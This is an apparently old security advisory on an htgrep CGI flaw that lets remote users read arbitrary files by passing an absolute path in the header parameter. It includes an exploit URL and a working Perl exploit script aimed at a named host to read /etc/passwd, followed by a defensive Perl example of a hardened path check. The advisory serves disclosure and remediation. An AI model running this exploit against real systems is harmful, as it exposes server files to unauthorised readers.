COMMAND

    htgrep

SYSTEMS AFFECTED

    Htgrep CGI

PROBLEM

    'n30' found the following.  Any remote user can use htgrep to view
    arbitrary files on the system with the privileges of the web user.
    The CGI allows a user to specify a header and footer file to be
    appended to the search output; this file should be located in the
    wwwroot, which is specified in the script itself.  Any attempt to
    specify a header or footer file using backwards directory
    referencing is trapped.  However, it is still possible to specify
    a file using an absolute path.

    Exploit:

        http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd

    The file /etc/passwd will be displayed instead of the default
    header file.  Code:

    #!/usr/local/bin/perl
    #
    # Htgrep EXPLOIT Script by n30 17/8/2000
    #
    # For: Unix/Linux all Distro's
    #      maybe Winnt?? anyone??
    #
    # Versions: All upto latest: htgrep v3.0
    #
    # Info: to find the version number being used:
    #
    #	www.server.com/cgi-bin/htgrep/version
    #
    # Some ppl use a wrapper for the script thusly
    # eliminating the file argument, the sploit will
    # still werk just add &hdr=<filename> to the end :-)
    #
    # if &isindex=<text> is present in the URL REMOVE IT!!!
    # or else the exploit won't werk :-)
    #
    # Mail : n30@gmx.co.uk
    
    use strict;
    use LWP::UserAgent;
    use HTTP::Request;
    use HTTP::Response;
    my $ua = new LWP::UserAgent;
    
    # *************************************************
    my $TargetHost="www.dematel.com";
    my $TargetPath="/cgibin/htgrep";
    # SearchFile can commonly be index.html or some other file in the wwwroot
    my $SearchFile="index.html";
    # FiletoGet ?? think for ur self:
    my $FiletoGet="/etc/passwd";
    # **************************************************
    
    my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";
    
    print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");

    print("URL: $url\n\n");

    my $request = new HTTP::Request('GET', $url);
    my $response = $ua->request($request);
    if ($response->is_success) {
        print $response->content;
    } else {
        print $response->error_as_HTML;
    }

SOLUTION

    The author has been notified; it is likely that an update will be
    available shortly.
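
    Until a fixed release exists, the header/footer check can be
    tightened locally.  The following is an added example, not htgrep's
    own code and not from the author: it contrasts a check that only
    traps ".." with one that resolves the path and confirms it stays
    under the wwwroot.  The sub names, the temporary document root and
    header.html are constructed for illustration.

```perl
#!/usr/bin/perl
# Added illustration; hypothetical names, not taken from the htgrep source.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Constructed document root holding one legitimate header file.
my $WWWROOT = realpath(tempdir(CLEANUP => 1));
open(my $fh, '>', "$WWWROOT/header.html") or die "create: $!";
print $fh "<h1>Search results</h1>\n";
close $fh;

# Weak check, modelled on the advisory's description: ".." is trapped,
# but a value that is already an absolute path is used unchanged.
sub weak_hdr_path {
    my ($hdr) = @_;
    return if $hdr =~ m{\.\.};
    return $hdr =~ m{^/} ? $hdr : "$WWWROOT/$hdr";
}

# Hardened check: always join the value onto the document root, resolve
# symlinks and dot segments, then require the result to lie inside the root.
sub safe_hdr_path {
    my ($hdr) = @_;
    return if !defined $hdr || $hdr eq '' || $hdr =~ /\0/;
    # catfile() collapses the doubled slash, so "/etc/passwd" becomes
    # "<root>/etc/passwd" instead of escaping the root.
    my $full = eval { realpath(File::Spec->catfile($WWWROOT, $hdr)) };
    return unless defined $full && -f $full;
    # Compare against "<root>/" so a sibling such as "<root>2" cannot match.
    return unless index($full, "$WWWROOT/") == 0;
    return $full;
}

# Constructed inputs: a normal header, a traversal, and the advisory's case.
for my $hdr ('header.html', '../../etc/passwd', '/etc/passwd') {
    printf "%-18s weak=%-40s safe=%s\n", $hdr,
        weak_hdr_path($hdr) // 'rejected',
        safe_hdr_path($hdr) // 'rejected';
}
```

    Only the first input passes the hardened check; the weak check
    returns /etc/passwd unchanged for the third.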